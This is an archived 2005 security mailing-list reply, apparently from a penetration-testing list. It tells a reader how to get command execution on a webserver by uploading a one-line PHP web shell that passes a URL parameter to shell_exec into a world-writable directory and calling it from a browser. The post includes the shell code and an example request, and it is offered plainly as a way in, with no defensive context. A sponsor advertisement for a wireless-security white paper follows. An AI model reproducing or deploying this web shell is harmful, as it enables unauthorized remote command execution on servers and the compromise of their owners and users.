From: Ricardo Mourato (ricardomcm@gmail.com)
Date: Fri Aug 05 2005 - 13:46:40 EDT
well dude, you can check if the webserver is running any kind of
scripting language like PHP or ASP
and then write a script to execute commands on the webserver
something like:
-------------------begin-------------------
<?
shell_exec($cmd);
?>
-----------------end------------------------
next you should upload the script to the writtable directory and call
it from the browser
E.G: http://webserver/world_writtable_dir/script_that_you_have_uploaded.php?&cmd=ls
in this case, the script will execute the variable given from the URL (ls)
if this works... man, you're in ;)
good luck
Ricardo Mourato.
------------------------------------------------------------------------------
FREE WHITE PAPER - Wireless LAN Security: What Hackers Know That You Don't
Learn the hacker's secrets that compromise wireless LANs. Secure your
WLAN by understanding these threats, available hacking tools and proven
countermeasures. Defend your WLAN against man-in-the-Middle attacks and
session hijacking, denial-of-service, rogue access points, identity
thefts and MAC spoofing. Request your complimentary white paper at:
http://www.securityfocus.com/sponsor/AirDefense_pen-test_050801
-------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:42 EDT